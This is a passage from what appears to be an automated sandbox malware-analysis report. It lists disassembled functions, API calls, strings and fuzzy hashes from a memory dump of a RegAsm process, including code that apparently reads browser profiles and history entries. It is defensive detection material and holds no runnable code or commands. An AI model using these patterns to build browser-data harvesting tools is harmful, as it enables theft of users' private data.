                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                        • GetDC.USER32 ref: 004140E3
                                                                                                                                        • wcslen.MSVCRT ref: 00414123
                                                                                                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                        • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                        • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                        • String ID: %s:$EDIT$STATIC
                                                                                                                                        • API String ID: 2080319088-3046471546
                                                                                                                                        • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                        • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                        • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                        • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                        APIs
                                                                                                                                        • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                        • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                        • memset.MSVCRT ref: 00413292
                                                                                                                                        • memset.MSVCRT ref: 004132B4
                                                                                                                                        • memset.MSVCRT ref: 004132CD
                                                                                                                                        • memset.MSVCRT ref: 004132E1
                                                                                                                                        • memset.MSVCRT ref: 004132FB
                                                                                                                                        • memset.MSVCRT ref: 00413310
                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                        • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                        • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                        • memset.MSVCRT ref: 004133C0
                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                        • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                        • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                        • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                        • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                        Strings
                                                                                                                                        • {Unknown}, xrefs: 004132A6
                                                                                                                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                        • API String ID: 4111938811-1819279800
                                                                                                                                        • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                        • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                        • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                        • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                        • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                        • SetCursor.USER32(00000000), ref: 0040129E
                                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                        • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                        • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                        • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                        • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                        • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                        • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                        • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 829165378-0
                                                                                                                                        • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                        • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                        • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                        • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                        APIs
                                                                                                                                        • memset.MSVCRT ref: 00404172
                                                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                        • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                        • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                        • memset.MSVCRT ref: 00404200
                                                                                                                                        • memset.MSVCRT ref: 00404215
                                                                                                                                        • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                        • wcscpy.MSVCRT ref: 00404242
                                                                                                                                        • memset.MSVCRT ref: 0040426E
                                                                                                                                        • memset.MSVCRT ref: 004042CD
                                                                                                                                        • memset.MSVCRT ref: 004042E2
                                                                                                                                        • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                        • wcscpy.MSVCRT ref: 00404311
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                        • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                        • API String ID: 2454223109-1580313836
                                                                                                                                        • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                        • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                        • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                        • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                        • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                        • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                        • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                        • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                        • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                        • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                        • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                        • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                        • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                        • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                        • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                          • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                          • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                        • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                        • API String ID: 4054529287-3175352466
                                                                                                                                        • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                        • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                        • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                        • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _snwprintf$memset$wcscpy
                                                                                                                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                        • API String ID: 2000436516-3842416460
                                                                                                                                        • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                        • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                        • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                        • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                          • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                        • free.MSVCRT ref: 0040E49A
                                                                                                                                          • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                        • memset.MSVCRT ref: 0040E380
                                                                                                                                          • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                          • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                        • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                        • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                        • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                                                                                                                                        • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                                                                                                                                        • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                        • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                        • API String ID: 3849927982-2252543386
                                                                                                                                        • Opcode ID: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                                                                                                                                        • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                        • Opcode Fuzzy Hash: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                                                                                                                                        • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                        APIs
                                                                                                                                        • memset.MSVCRT ref: 004091E2
                                                                                                                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                        • memcmp.MSVCRT ref: 004092D9
                                                                                                                                        • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                        • memcmp.MSVCRT ref: 0040933B
                                                                                                                                        • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                        • memcmp.MSVCRT ref: 00409411
                                                                                                                                        • memcmp.MSVCRT ref: 00409429
                                                                                                                                        • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                        • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                        • memcmp.MSVCRT ref: 004094AC
                                                                                                                                        • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                        • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3715365532-3916222277
                                                                                                                                        • Opcode ID: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                                                                                        • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                        • Opcode Fuzzy Hash: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                                                                                        • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                        • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                        • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                        • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                          • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                          • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                          • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                        • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                        • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                        • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                        • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1700100422-0
                                                                                                                                        • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                        • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                        • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                        • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                        APIs
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                        • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                        • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                        • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                        • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 552707033-0
                                                                                                                                        • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                        • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                        • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                        • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                        APIs
                                                                                                                                        • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                        • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                        • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                        • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                        • GetParent.USER32(?), ref: 00406136
                                                                                                                                        • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                        • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                        • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                        • String ID: A
                                                                                                                                        • API String ID: 2892645895-3554254475
                                                                                                                                        • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                        • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                        • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                        • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                          • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                          • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                        • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                        • strchr.MSVCRT ref: 0040C140
                                                                                                                                        • strchr.MSVCRT ref: 0040C151
                                                                                                                                        • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                        • memset.MSVCRT ref: 0040C17A
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                        • String ID: 4$h
                                                                                                                                        • API String ID: 4019544885-1856150674
                                                                                                                                        • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                        • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                        • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                        • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                        • String ID: 0$6
                                                                                                                                        • API String ID: 4066108131-3849865405
                                                                                                                                        • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                        • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                        • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                        • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                        APIs
                                                                                                                                        • memset.MSVCRT ref: 004082EF
                                                                                                                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                        • memset.MSVCRT ref: 00408362
                                                                                                                                        • memset.MSVCRT ref: 00408377
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
